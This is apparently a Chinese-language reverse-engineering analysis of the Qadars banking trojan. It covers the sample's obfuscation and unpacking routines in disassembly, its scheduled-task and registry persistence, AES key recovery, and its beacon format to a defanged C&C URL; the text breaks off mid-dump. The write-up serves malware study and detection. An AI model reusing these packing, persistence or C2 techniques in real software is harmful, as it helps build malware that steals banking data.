最近,我注意到一个讨论Qadars银行木马的 论坛主题 ,并且在当时,Qadars银行木马在VT(virustotal.com)的检测率非常低(4/56),SHA1:563379a48d876f6c35317bb7551efeb55754123056109ab030d1e796ae1b9c2c。
我觉得它是一个很合适进行深层次技术探究的候选对象,我将我的分析过程分为三个部分:
第一阶段:对恶意的程序流程进行混淆处理;保护并解密主模块。 第二阶段:收集每个系统特有的信息,在系统上确保持久性并运行新的进程。(第三阶段) 第三阶段:与命令和控制(C&C)中心建立通信。
这个阶段包括两个不同的部分。这两部分都用于从检测中保护恶意软件的主模块。该恶意软件是通过执行了下列步骤来实现的:
通过创建“垃圾”代码来混淆恶意软件的程序流程; 通过创建一个结构化异常处理(SEH)的异常来改变程序的控制流程并将控制流程传递给它; 将解密的BLOB数据变为一个新的代码段,并从一个异常中跳到这个新的代码段中; 通过执行一个“彩蛋”找到附加的BLOB数据,这个BLOB数据在解密,解压之后,成为了一个新的PE镜像文件。这个文件就是恶意软件的主模块。
· 检索KERNEL32的地址;
· 检索HeapCreate的地址,分配的大小为0×2729的缓冲区。
调用HeapCreate之前的堆栈如下,
012F7A0 00040000 ;HEAP_CREATE_ENABLE_EXECUTE 012F7A4 00002729 ;initial size 012F7A8 00002729 ;max size
在原始文件中取偏移0040C9E8处的BLOB数据,然后复制并排列BLOB数据。
这个BLOB数据被看作一个数组。变形后的数组成为了新的代码段然后把控制流程传递给它。
恶意软件采取的将数组转换到有效代码的步骤是简单位互换基于生成密钥的偏移量进行计算的。该算法如下所示:
1.在堆(heap)中分配缓冲区,然后将BLOB数据复制到该缓冲区中,该缓冲区将被视为一个数组。
2.计算出的偏移量为第一个将被交换的字符:
;Initial key is 0x5A219DBA. ;.text:0041F858 8B 45 14 mov eax, [ebp+key] ;.text:0041F85B 33 D2 xor edx, edx ;.text:0041F85D F7 75 10 div [ebp+data_size] ;.text:0041F860 89 55 E8 mov [ebp+reminder], edx
3.本地存储的结果:
;.text:0041FAC5 8B 4D 08 mov ecx, [ebp+allocated_buffer] ;.text:0041FAC8 03 4D E8 add ecx, [ebp+reminder] ;.text:0041FACB 8A 11 mov dl, [ecx] ;.text:0041FACD 88 55 E4 mov [ebp+current_char_3], dl
4.计算出的偏移量为第二个要交换的字符,并将其存储在本地。这个字符是从数组的末尾减去已经处理的字符数量得到的:
;.text:0041FC18 8B 55 08 mov edx, [ebp+allocated_buffer] ;.text:0041FC1B 03 55 FC add edx, [ebp+counter] ;.text:0041FC1E 8A 42 FF mov al, [edx-1] ;.text:0041FC21 88 45 EC mov [ebp+current_char_1], a
5.交换第一个和第二个字符:
;.text:0041FD4D 8B 45 08 mov eax, [ebp+allocated_buffer] ;.text:0041FD50 03 45 E8 add eax, [ebp+reminder] ;.text:0041FD53 8A 4D EC mov cl, [ebp+current_char_1] ;.text:0041FD56 88 08 mov [eax], cl ;.text:0041FFCE 8B 45 08 mov eax, [ebp+allocated_buffer] ;.text:0041FFD1 03 45 FC add eax, [ebp+counter] ;.text:0041FFD4 8A 4D E4 mov cl, [ebp+current_char_3] ;.text:0041FFD7 88 48 FF mov [eax-1], cl
例如,前两个字符被交换。交换前的内存为:
00BD0614 00 00BD2728 A6
交换后的内存为:
00BD0614 A6 00BD2728 00
6.计算用于下一次第一个字符被交换时所需要计算的密钥:
;.text:004201CD 8B 55 14 mov edx, [ebp+key] ;.text:004201D0 C1 EA 19 shr edx, 19h ;.text:004201D3 89 55 F0 mov [ebp+new_key], edx ;.text:004203B1 8B 4D 14 mov ecx, [ebp+key] ;.text:004203B4 C1 E1 07 shl ecx, 7 ;.text:004203B7 89 4D 14 mov [ebp+key], ecx ;.text:00420680 8B 55 14 mov edx, [ebp+key] ;.text:00420683 0B 55 F0 or edx, [ebp+new_key] ;.text:00420686 89 55 14 mov [ebp+key], edx ;.text:004207FB 8B 55 14 mov edx, [ebp+key] ;.text:004207FE 2B 55 10 sub edx, [ebp+data_size] ;.text:00420801 89 55 14 mov [ebp+key], edx ;.text:00420AD5 8B 45 14 mov eax, [ebp+key] ;.text:00420AD8 2D D2 02 96 49 sub eax, 499602D2h ;.text:00420ADD 89 45 14 mov [ebp+key], eax
跳转到新创建的代码段:
.text:00406447 FF 55 FC call [ebp+allocated_buffer]
关于第一阶段的第二部分的更多详细信息(在新创建的代码段部分):
检索API的地址并在运行时立即调用这些API;没有导入表的创建; 定位XOR加密的BOLB数据; 解密BLOB数据并对其进行解压缩; 进行解密,解压缩后的BLOB数据是恶意软件的主要模块。
为了查找BLOB数据,该恶意软件使用了一种类似于在shellcode中使用的“彩蛋”技术的手法。首先,它计算出如下数据:
0012F74C 56 6F FC 5A 83 1A 34 D9 6F 5C 41 73 28 94 EF 13 VonZâ.4+o/As(ön. 0012F75C 31 A8 B9 0B 1¿¦
恶意软件模块主体的内容被复制到了在堆上分配的缓冲区。前8个字节是恶意软件在可执行文件中搜索的标志。这就是所谓的“蛋”,它被发现在磁盘上的可执行文件的偏移0xE511处。从该文件的尾部开始到头部进行扫描。一旦标记被找到时,恶意软件会计算出被加密的BLOB数据的大小。为了做到这一点,它取了跟在“蛋”后面的4个字节,并且将这个4个字节与上面的BLOB数据中的偏移+0×08处的数据进行异或(XOR)。
接着,该文件中的8个字节和上述BLOB数据(偏移 +0x0C)被用于计算初始的XOR 密钥,计算结果将被用于解密BLOB数据。文件中被加密的数据是从偏移0xE525处开始的;BLOB数据的大小为0xC76A。下面的功能用于BLOB数据的解密:
debug025:00BD0CBE decode_data_to_decompress proc near debug025:00BD0CBE debug025:00BD0CBE var_18= dword ptr -18h debug025:00BD0CBE var_14= dword ptr -14h debug025:00BD0CBE var_10= dword ptr -10h debug025:00BD0CBE var_C= dword ptr -0Ch debug025:00BD0CBE var_4= dword ptr -4 debug025:00BD0CBE data= dword ptr 8 debug025:00BD0CBE size= dword ptr 0Ch debug025:00BD0CBE key= dword ptr 10h debug025:00BD0CBE debug025:00BD0CBE 55 push ebp debug025:00BD0CBF 89 E5 mov ebp, esp debug025:00BD0CC1 83 EC 1C sub esp, 1Ch debug025:00BD0CC4 53 push ebx debug025:00BD0CC5 56 push esi debug025:00BD0CC6 57 push edi debug025:00BD0CC7 01 FF add edi, edi debug025:00BD0CC9 8B 5D 0C mov ebx, [ebp+size] debug025:00BD0CCC F7 D0 not eax debug025:00BD0CCE 42 inc edx debug025:00BD0CCF 09 55 F0 or [ebp+var_10], edx debug025:00BD0CD2 83 EB 03 sub ebx, 3 debug025:00BD0CD5 0F AF F7 imul esi, edi debug025:00BD0CD8 81 F1 B8 00 00 00 xor ecx, 0B8h debug025:00BD0CDE 8B 75 08 mov esi, [ebp+data] debug025:00BD0CE1 87 55 EC xchg edx, [ebp+var_14] debug025:00BD0CE4 21 F2 and edx, esi debug025:00BD0CE6 debug025:00BD0CE6 loc_BD0CE6: debug025:00BD0CE6 41 inc ecx debug025:00BD0CE7 83 FB 00 cmp ebx, 0 ; ebx is the counter debug025:00BD0CEA 74 5C jz short loc_BD0D48 debug025:00BD0CEC 49 dec ecx debug025:00BD0CED 1B 55 F4 sbb edx, [ebp+var_C] debug025:00BD0CF0 8B 06 mov eax, [esi] debug025:00BD0CF2 33 4D F4 xor ecx, [ebp+var_C] debug025:00BD0CF5 01 C9 add ecx, ecx debug025:00BD0CF7 33 45 10 xor eax, [ebp+key] debug025:00BD0CFA 09 DF or edi, ebx debug025:00BD0CFC 89 06 mov [esi], eax debug025:00BD0CFE 2B 55 EC sub edx, [ebp+var_14] debug025:00BD0D01 F7 DF neg edi debug025:00BD0D03 49 dec ecx debug025:00BD0D04 8B 45 10 mov eax, [ebp+key] debug025:00BD0D07 87 55 E8 xchg edx, [ebp+var_18] debug025:00BD0D0A 0F AF FA imul edi, edx debug025:00BD0D0D F7 D7 not edi debug025:00BD0D0F EB 03 jmp short loc_BD0D14 debug025:00BD0D14 debug025:00BD0D14 loc_BD0D14: debug025:00BD0D14 C1 C0 07 rol eax, 7 debug025:00BD0D17 4A dec edx debug025:00BD0D18 01 F7 add edi, esi debug025:00BD0D1A EB 01 jmp short loc_BD0D1D debug025:00BD0D1D debug025:00BD0D1D loc_BD0D1D: debug025:00BD0D1D 2B 45 0C sub eax, [ebp+size] debug025:00BD0D20 2B 55 FC sub edx, [ebp+var_4] debug025:00BD0D23 87 FF xchg edi, edi debug025:00BD0D25 F7 D7 not edi debug025:00BD0D27 2D D2 02 96 49 sub eax, 499602D2h debug025:00BD0D2C 83 EA 06 sub edx, 6 debug025:00BD0D2F 01 F7 add edi, esi debug025:00BD0D31 89 45 10 mov [ebp+key], eax debug025:00BD0D34 81 E2 80 00 00 00 and edx, 80h debug025:00BD0D3A 0B 4D E8 or ecx, [ebp+var_18] debug025:00BD0D3D 4B dec ebx debug025:00BD0D3E 11 C7 adc edi, eax debug025:00BD0D40 29 C7 sub edi, eax debug025:00BD0D42 46 inc esi debug025:00BD0D43 0F AF FB imul edi, ebx debug025:00BD0D46 EB 9E jmp short loc_BD0CE6 debug025:00BD0D48 ; ------------------------------ debug025:00BD0D48 debug025:00BD0D48 loc_BD0D48: debug025:00BD0D48 87 55 EC xchg edx, [ebp+var_14] debug025:00BD0D4B 29 F3 sub ebx, esi debug025:00BD0D4D 5F pop edi debug025:00BD0D4E 5E pop esi debug025:00BD0D4F 5B pop ebx debug025:00BD0D50 C9 leave debug025:00BD0D51 C2 0C 00 retn 0Ch debug025:00BD0D51 decode_data_to_decompress endp
接着,被解密的BLOB数据被解压缩。调用RtlDecompressBuffer前的堆栈如下:
0012F270 00000002 ;compression format ;#define COMPRESSION_FORMAT_LZNT1 (0x0002) 0012F274 00C20000 debug027:unk_C20000 ;destination 0012F278 00013600 ;uncompressed size 0012F27C 00C0857D debug026:00C0857D ;compressed buffer 0012F280 0000C76A ;compressed size 0012F284 0012F714 Stack[00000BBC]:0012F714 ;final uncompressed size
1.收集有关系统的数据;
2.将自身复制到位于“%AppData%/[random_path]/[random_file_name].exe”中的一个随机命名的文件;
3.建立一个在当前用户下一次登录系统时运行自身的计划任务;
4.在注册表中创建注册表项,并存储AES加密的数据(步骤1中搜集的系统数据);
5.从“%AppData%/[random_path]/[random_file_name].exe”中运行下一阶段的可执行文件。
有一个额外的细节,恶意软件在收集有关系统的数据时,创建了一个有趣的结构。例如,在测试机上,恶意软件创建的结构如下:
00 00 02 00 00 00 06 00 03 3C 80 5E 96 58 91 B6 07 54 A4 00 00 00 03 00 00 00 37 36 34 38 37 2D 33 34 31 2D 38 36 31 39 31 30 33 2D 32 32 30 36 34 00 2C 00 00 00 41 32 32 2D 30 30 30 30 31 00 00 00 00 00 00 00 2C CC C0 A8 22 31 A6 35 23 98 E5 97 52 11 03 00 00 00 00 00 45 53 07 54 50 6F 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 34 34 30 32 00 00 00 00 00 00 00 B8 03 00 00 80 5E 96 58 00 01 00 00 EA 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 47 6C C7 00 BA 0D F0 AD BA 0D F0 AD BA +0x02 dwNumberOfProcessors (SYSTEM_INFO) +0x06 wProcessorLevel (SYSTEM_INFO) +0x08 wProcessorRevision (SYSTEM_INFO) +0x0A VolumeSerialNumber +0x0E InstallDate "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion" +0x12 DigitalProductID "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion"
计算上述结构的MD5散列并存储在本地。创建ASCII和Unicode格式化的字符串所表示的MD5散列。例如,在测试机上:
00853D20 39 37 32 39 35 38 41 36 35 38 38 30 42 35 35 41 972958A65880B55A 00853D30 30 45 42 44 35 35 35 39 30 37 38 43 31 37 33 35 0EBD5559078C1735 00853E58 39 00 37 00 32 00 39 00 35 00 38 00 41 00 36 00 9.7.2.9.5.8.A.6. 00853E68 35 00 38 00 38 00 30 00 42 00 35 00 35 00 41 00 5.8.8.0.B.5.5.A. 00853E78 30 00 45 00 42 00 44 00 35 00 35 00 35 00 39 00 0.E.B.D.5.5.5.9. 00853E88 30 00 37 00 38 00 43 00 31 00 37 00 33 00 35 00 0.7.8.C.1.7.3.5.
两个MD5散列将和计算机名称连接在一起(#作为分隔符)。然后计算出连接后的字符串的MD5散列。这个MD5散列是一个恶意软件使用的独一无二的GUID。该恶意软件使用了相同的算法,产生了相同的结果,这个结果对于每一个被感染的系统来说是独一无二的。
接下来,恶意软件在“%AppData%”中创建了一个随机命名的路径并将自身复制到该目录中,文件名称是随机命名的可执行文件。例如,测试系统上,该恶意软件创建其自身的副本在下面的位置:
“%AppData%/MfzxAHCb/HQHKWbsv/PMqLMKtj/oPQVNiRgs.exe”
新创建的副本的MD5散列与字符“BOTNET2”存储在一起:
0012F628 8A 15 4F AE 3B 78 B4 8D B1 71 C4 C9 49 99 E0 C0 è.O«;x¦.¦q-+IÖa+ 0012F638 42 4F 54 4E 45 54 32 00 00 00 00 00 00 00 00 00 BOTNET2.........
恶意软件创建的计划任务将在当前用户下次登录系统时运行。这是通过执行以下调用顺序实现的:
1.CoCreateInstance (creates ITaskScheduler, CLSID {148bd52a-a2ab-11ce-b11f-00aa00530503}, IID {148bd527-a2ab-11ce-b11f-00aa00530503}). 2.ITaskScheduler::NewWorkItem (creates ITask, CLSID_CTask {148BD520-A2AB-11CE-B11F-00AA00530503}, IID_ITask {148BD524-A2AB-11CE-B11F-00AA00530503}). 3.ITask::SetFlags. 4.ITask:SetAccountInformation. 5.ITask::SetWorkingDirectory. 6.ITask::SetApplicationName. 7.ITask::SetMaxRunTime. 8.ITask::CreateTrigger. 9.ITaskTrigger:SetTrigger. ;PTASK_TRIGGER: ;Stack[00000F08]:0012E1BC 30 00 dw 30h ; cbTriggerSize ;Stack[00000F08]:0012E1BE 00 00 dw 0 ; Reserved ............................... ;Stack[00000F08]:0012E1D8 04 00 00 00 dd 4 ; rgFlags ;Stack[00000F08]:0012E1DC 07 00 00 00 dd 7 ; TASK_EVENT_TRIGGER_AT_LOGON ;Stack[00000F08]:0012E1E0 01 00 00 00 dd 1 ; Type 10.ITask::QueryInterface (CLSID_IPersistFile) 11.IPersistFile::Save.
创建注册表项“HKCU//Software//Classes//CLSID//{[unique_per_system_guid]}”,用“@”来填充子项“0”和“1”。注册表中的数据是通过AES加密的。注册表将数据传递到了下一阶段。AES的密钥可以从硬编码的数据中获得:
00854028 08 00 99 E3 72 5D A8 0E FB DF A8 87 42 D4 AA AB ..Öpr]¿.v¯¿çB+¬½ 00854038 DE AD 35 3F 41 B9 80 5D 85 D4 2E A1 00 E6 E1 8C ¦¡5?A¦Ç]à+.í.µßî 00854048 31 00 01 00 53 C3 00 00 39 37 32 39 35 38 41 36 1...S+.
得出的密钥为:
0012E750 E3 99 00 08 0E A8 5D 72 87 A8 DF FB AB AA D4 42 pÖ...¿]r翯v½¬+B
得到密钥的算法为:
.text:0040EA85 0F B6 79 FE movzx edi, byte ptr [ecx-2] .text:0040EA89 0F B6 59 FF movzx ebx, byte ptr [ecx-1] .text:0040EA8D C1 E7 08 shl edi, 8 .text:0040EA90 0B FB or edi, ebx .text:0040EA92 0F B6 19 movzx ebx, byte ptr [ecx] .text:0040EA95 C1 E7 08 shl edi, 8 .text:0040EA98 0B FB or edi, ebx .text:0040EA9A 0F B6 59 01 movzx ebx, byte ptr [ecx+1] .text:0040EA9E C1 E7 08 shl edi, 8 .text:0040EAA1 0B FB or edi, ebx .text:0040EAA3 89 3C 96 mov [esi+edx*4], edi .text:0040EAA6 42 inc edx .text:0040EAA7 83 C1 04 add ecx, 4 .text:0040EAAA 83 FA 04 cmp edx, 4 .text:0040EAAD 7C D6 jl short loc_40EA85
接下来,恶意软件运行其位于“%AppData%”目录下的副本:
.text:00403BA1 8D 55 E4 lea edx, [ebp+var_1C] .text:00403BA4 52 push edx ; lpProcessInformation .text:00403BA5 8D 45 8C lea eax, [ebp+StartupInfo] .text:00403BA8 50 push eax ; lpStartupInfo .text:00403BA9 53 push ebx ; lpCurrentDirectory .text:00403BAA 53 push ebx ; lpEnvironment .text:00403BAB 68 00 00 00 04 push CREATE_DEFAULT_ERROR_MODE ; dwCreationFlags .text:00403BB0 53 push ebx ; bInheritHandles .text:00403BB1 53 push ebx ; lpThreadAttributes .text:00403BB2 53 push ebx ; lpProcessAttributes .text:00403BB3 68 F0 19 41 00 push offset CommandLine ; lpCommandLine .text:00403BB8 8D 8D 79 FC FF FF lea ecx, [ebp+MultiByteStr] .text:00403BBE 51 push ecx ; lpApplicationName ;"%AppData%/MfzxAHCb/HQHKWbsv/PMqLMKtj/oPQVNiRgs.exe". .text:00403BBF 89 5D E4 mov [ebp+var_1C], ebx .text:00403BC2 89 5D E8 mov [ebp+var_18], ebx .text:00403BC5 89 5D EC mov [ebp+var_14], ebx .text:00403BC8 89 5D F0 mov [ebp+var_10], ebx .text:00403BCB C7 45 8C 44 00 00 00 mov [ebp+StartupInfo.cb], 44h .text:00403BD2 FF 15 60 10 41 00 call ds:CreateProcessA
恶意软件会计算一些有关计算机的特定数据(如在第二阶段所述的),并将结果与保存在:
“KEY_CURRENT_USER/Software/Classes/CLSID/{[computer_unique_guid]}”
中的数据进行比较。如果相等,则恶意软件执行到下一个阶段。
存储在注册表中的数据“HKEY_CURRENT_USER/ Software/Classes/CLSID/{[computer_unique_guid]}”列举如下。
例如,在测试机上,数据的大小是0×170,存储在注册表中的加密数据为:
00854B78 5F 1D B6 44 5B 87 A7 2E 74 81 51 7F 34 CA CC 9D _.¦D[çº.t.Q.4-¦. 00854B88 FC 74 61 04 C2 61 9E 99 E5 A7 64 02 8E D2 79 05 nta.-aPÖsºd.Ä-y. 00854B98 68 41 E1 33 96 C7 B7 EB 83 35 07 43 47 1A A8 74 hAß3û¦+dâ5.CG.¿t 00854BA8 F7 CC B0 27 73 7A 7E 63 60 D7 5B AB 43 1B 41 65 ˜¦¦'sz~c`+[½C.Ae 00854BB8 7F D1 A6 8B 85 B1 DE E4 B2 B5 A7 7E 74 B6 44 14 .-ªïদS¦¦º~t¦D. 00854BC8 B5 B8 D3 56 D3 0A 72 CC 62 BF 64 F4 3F 4D F1 D8 ¦++V+.r¦b+d(?M±+ 00854BD8 84 2B 45 B8 DB BA 22 C2 B5 95 34 FA 69 85 A6 01 ä+E+¦¦"-¦ò4·iàª. 00854BE8 02 80 29 90 60 A9 11 13 C3 77 31 6E 06 23 BA 3A .Ç).`¬..+w1n.#¦: 00854BF8 64 D5 78 FA 2C E3 E5 3A 2B 18 4C 1F 74 31 B3 25 d+x·,ps:+.L.t1¦% 00854C08 BF 78 2C 45 4F 71 F6 F1 B4 5D 16 E3 CD 40 60 B8 +x,EOq÷±¦].p-@`+ 00854C18 D9 7B CE AF 87 4F 88 75 FB CC DB 8F AA 33 CF 46 +{+»çOêuv¦¦.¬3-F 00854C28 3D 5D 7C 46 85 B5 92 33 B7 B8 E8 E9 5D 88 17 31 =]|Fà¦Æ3++FT]ê.1 00854C38 46 76 F4 EA 05 D2 71 04 55 B0 BF B3 A1 E9 9C BF Fv(O.-q.U¦+¦íT£+ 00854C48 E7 E6 5A 51 C5 F1 4A DF CF 46 8B 4F 54 57 57 4F tµZQ+±J¯-FïOTWWO 00854C58 6E EF 29 C1 BC C0 32 14 B5 3D 84 4C 87 7A 73 BA nn)-++2.¦=äLçzs¦ 00854C68 40 B2 06 B7 42 85 7C 44 65 1E EE 69 2F 7E 37 B8 @¦.+Bà|De.ei/~7+ 00854C78 E5 A6 CC 26 06 9D 32 B3 71 7E D0 13 45 CF 01 D9 sª¦&..2¦q~-.E-.+ 00854C88 77 DA 8C 8E 90 3D 0E D1 F7 FE B1 24 99 20 89 C7 w+îÄ.=.-˜¦¦$Ö ë¦ 00854C98 41 1D DA 62 66 08 AF 48 C9 F8 5C F8 3D 83 7E 92 A.+bf.»H+°/°=â~Æ 00854CA8 BF 8C 18 49 CA 81 CE 77 48 93 04 A3 B1 9D 07 60 +î.I-.+wHô.ú¦..` 00854CB8 5B CE A7 0D 23 09 B6 8D 7E 2E B9 B9 1A 73 3E 84 [+º.#.¦.~.¦¦.s>ä 00854CC8 21 9C EF 83 41 66 72 E1 61 4A 4D 62 4E 0E FF FE !£nâAfrßaJMbN. ¦ 00854CD8 C9 F2 15 3B BC 38 11 A2 2B 0C 35 CF F4 EB 35 E5 +=.;+8.ó+.5-(d5s
解密后的数据为:
00854E90 00 00 00 00 67 01 00 00 A6 69 46 69 72 73 74 54 ....g...ªiFirstT 00854EA0 69 6D 65 01 6E 6D 6F 64 75 6C 65 73 46 65 74 63 ime.nmodulesFetc 00854EB0 68 65 64 00 66 48 61 73 68 50 45 50 8A 15 4F AE hed.fHashPEPè.O« 00854EC0 3B 78 B4 8D B1 71 C4 C9 49 99 E0 C0 6C 73 7A 42 ;x¦.¦q-+IÖa+lszB 00854ED0 6F 74 6E 65 74 4E 61 6D 65 67 42 4F 54 4E 45 54 otnetNamegBOTNET 00854EE0 32 6D 73 7A 49 6E 73 74 61 6C 6C 50 61 74 68 78 2mszInstallPathx 00854EF0 55 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E UC:/Documents an 00854F00 64 20 53 65 74 74 69 6E 67 73 5C 69 5C 41 70 70 d Settings/i/App 00854F10 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 4D 66 lication Data/Mf 00854F20 7A 78 41 48 43 62 5C 48 51 48 4B 57 62 73 76 5C zxAHCb/HQHKWbsv/ 00854F30 50 4D 71 4C 4D 4B 74 6A 5C 6F 50 51 56 4E 69 52 PMqLMKtj/oPQVNiR 00854F40 67 73 2E 65 78 65 6C 77 49 6E 73 74 61 6C 6C 50 gs.exelwInstallP 00854F50 61 74 68 58 AA 43 00 3A 00 5C 00 44 00 6F 00 63 athX¬C.:./.D.o.c 00854F60 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 .u.m.e.n.t.s. .a 00854F70 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 .n.d. .S.e.t.t.i 00854F80 00 6E 00 67 00 73 00 5C 00 69 00 5C 00 41 00 70 .n.g.s./.i./.A.p 00854F90 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F .p.l.i.c.a.t.i.o 00854FA0 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 4D .n. .D.a.t.a./.M 00854FB0 00 66 00 7A 00 78 00 41 00 48 00 43 00 62 00 5C .f.z.x.A.H.C.b./ 00854FC0 00 48 00 51 00 48 00 4B 00 57 00 62 00 73 00 76 .H.Q.H.K.W.b.s.v 00854FD0 00 5C 00 50 00 4D 00 71 00 4C 00 4D 00 4B 00 74 ./.P.M.q.L.M.K.t 00854FE0 00 6A 00 5C 00 6F 00 50 00 51 00 56 00 4E 00 69 .j./.o.P.Q.V.N.i 00854FF0 00 52 00 67 00 73 00 2E 00 65 00 78 00 65 00 00 .R.g.s...e.x.e.. bytes 0 - 3 zeroes, bytes 4 - 7 the length of the data bytes 8 - ? data itself.
接着,数据被符号化:
00854D08 01 00 00 00 00 00 00 00 8A 15 4F AE 3B 78 B4 8D ........è.O«;x¦. 00854D18 B1 71 C4 C9 49 99 E0 C0 42 4F 54 4E 45 54 32 00 ¦q-+IÖa+BOTNET2. ............................................................................ 00854E18 00 00 00 00 00 00 00 00 00 00 00 00 00 43 3A 5C .............C:/ 00854E28 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 Documents and Se 00854E38 74 74 69 6E 67 73 5C 69 5C 41 70 70 6C 69 63 61 ttings/i/Applica 00854E48 74 69 6F 6E 20 44 61 74 61 5C 4D 66 7A 78 41 48 tion Data/MfzxAH 00854E58 43 62 5C 48 51 48 4B 57 62 73 76 5C 50 4D 71 4C Cb/HQHKWbsv/PMqL 00854E68 4D 4B 74 6A 5C 6F 50 51 56 4E 69 52 67 73 2E 65 MKtj/oPQVNiRgs.e 00854E78 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 xe.............. ............................................................................ 00854F28 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 ..C.:./.D.o.c.u. 00854F38 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 m.e.n.t.s. .a.n. 00854F48 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 d. .S.e.t.t.i.n. 00854F58 67 00 73 00 5C 00 69 00 5C 00 41 00 70 00 70 00 g.s./.i./.A.p.p. 00854F68 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 l.i.c.a.t.i.o.n. 00854F78 20 00 44 00 61 00 74 00 61 00 5C 00 4D 00 66 00 .D.a.t.a./.M.f. 00854F88 7A 00 78 00 41 00 48 00 43 00 62 00 5C 00 48 00 z.x.A.H.C.b./.H. 00854F98 51 00 48 00 4B 00 57 00 62 00 73 00 76 00 5C 00 Q.H.K.W.b.s.v./. 00854FA8 50 00 4D 00 71 00 4C 00 4D 00 4B 00 74 00 6A 00 P.M.q.L.M.K.t.j. 00854FB8 5C 00 6F 00 50 00 51 00 56 00 4E 00 69 00 52 00 /.o.P.Q.V.N.i.R. 00854FC8 67 00 73 00 2E 00 65 00 78 00 65 00 00 00 00 00 g.s...e.x.e.....
对存储在“HKEY_CURRENT_USER/Software/Classes/CLSID/{[computer_unique_guid]}/1″中的数据进行相同的操作。
00855EF8 90 67 85 00 D0 67 85 00 10 68 85 00 48 68 85 00 .gà.-gà..hà.Hhà. 00855F08 2F 6E 65 74 72 65 70 6F 72 74 2E 70 68 70 00 00 /netreport.php..
接着,将调用下面这个有趣函数:
.text:0040FB1B 50 push eax ;void * .text:0040FB1C 51 push ecx ;int ;db 'I-C957A26036A04#972958A65880B55A0EBD5559078C1735',0 ;this is computer_name#md5hash as described in the dump.txt .text:0040FB1D 57 push edi ;int ;'hxxp://soft.kcssoft.biz/netreport.php',0 .text:0040FB1E E8 FD FE FF FF call c2
例如,在测试机上,纯文本的PAYLOAD(长度为0x123)的第一部分为:
00856A90 82 A7 69 6C 70 73 7A 42 6F 74 49 44 78 30 49 2D éºilpszBotIDx0I- 00856AA0 43 39 35 37 41 32 36 30 33 36 41 30 34 23 39 37 C957A26036A04#97 00856AB0 32 39 35 38 41 36 35 38 38 30 42 35 35 41 30 45 2958A65880B55A0E 00856AC0 42 44 35 35 35 39 30 37 38 43 31 37 33 35 6B 6C BD5559078C1735kl 00856AD0 70 73 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E 30 pszVersiong2.0.0 00856AE0 2E 30 68 6D 61 69 6E 54 79 70 65 00 67 73 75 62 .0hmainType.gsub 00856AF0 54 79 70 65 00 67 42 69 74 6E 65 73 73 18 20 6B Type.gBitness. k 00856B00 64 77 54 69 6D 65 73 74 61 6D 70 00 64 44 61 74 dwTimestamp.dDat 00856B10 61 A2 66 4C 65 6E 67 74 68 00 66 6C 70 44 61 74 aófLength.flpDat 00856B20 61 40 A7 69 6C 70 73 7A 42 6F 74 49 44 78 30 49 a@ºilpszBotIDx0I 00856B30 2D 43 39 35 37 41 32 36 30 33 36 41 30 34 23 39 -C957A26036A04#9 00856B40 37 32 39 35 38 41 36 35 38 38 30 42 35 35 41 30 72958A65880B55A0 00856B50 45 42 44 35 35 35 39 30 37 38 43 31 37 33 35 6B EBD5559078C1735k 00856B60 6C 70 73 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E lpszVersiong2.0. 00856B70 30 2E 30 68 6D 61 69 6E 54 79 70 65 00 67 73 75 0.0hmainType.gsu 00856B80 62 54 79 70 65 01 67 42 69 74 6E 65 73 73 18 20 bType.gBitness. 00856B90 6B 64 77 54 69 6D 65 73 74 61 6D 70 00 64 44 61 kdwTimestamp.dDa 00856BA0 74 61 A2 66 4C 65 6E 67 74 68 00 66 6C 70 44 61 taófLength.flpDa 00856BB0 74 61 40 00 ta@
数据的格式是这样的,“字符串”+ 数据+ 一个字符的分隔符。
例如,“pszBotID” (字符串) +“x0I-C957A26036A04#972958A65880B55A0EBD5559078C1735”(数据) + “k” (分隔符)。
该恶意软件会生成一个9个字节的伪随机字符串,并将其添加到上面的数据中:
014CE6D8 09 00 00 00 79 78 65 46 5A 72 76 63 78 82 A7 69 ....yxeFZrvcxéºi 014CE6E8 6C 70 73 7A 42 6F 74 49 44 78 30 49 2D 43 39 35 lpszBotIDx0I-C95 014CE6F8 37 41 32 36 30 33 36 41 30 34 23 39 37 32 39 35 7A26036A04#97295 014CE708 38 41 36 35 38 38 30 42 35 35 41 30 45 42 44 35 8A65880B55A0EBD5 014CE718 35 35 39 30 37 38 43 31 37 33 35 6B 6C 70 73 7A 559078C1735klpsz 014CE728 56 65 72 73 69 6F 6E 67 32 2E 30 2E 30 2E 30 68 Versiong2.0.0.0h 014CE738 6D 61 69 6E 54 79 70 65 00 67 73 75 62 54 79 70 mainType.gsubTyp 014CE748 65 00 67 42 69 74 6E 65 73 73 18 20 6B 64 77 54 e.gBitness. kdwT 014CE758 69 6D 65 73 74 61 6D 70 00 64 44 61 74 61 A2 66 imestamp.dDataóf 014CE768 4C 65 6E 67 74 68 00 66 6C 70 44 61 74 61 40 A7 Length.flpData@º 014CE778 69 6C 70 73 7A 42 6F 74 49 44 78 30 49 2D 43 39 ilpszBotIDx0I-C9 014CE788 35 37 41 32 36 30 33 36 41 30 34 23 39 37 32 39 57A26036A04#9729 014CE798 35 38 41 36 35 38 38 30 42 35 35 41 30 45 42 44 58A65880B55A0EBD 014CE7A8 35 35 35 39 30 37 38 43 31 37 33 35 6B 6C 70 73 5559078C1735klps 014CE7B8 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E 30 2E 30 zVersiong2.0.0.0 014CE7C8 68 6D 61 69 6E 54 79 70 65 00 67 73 75 62 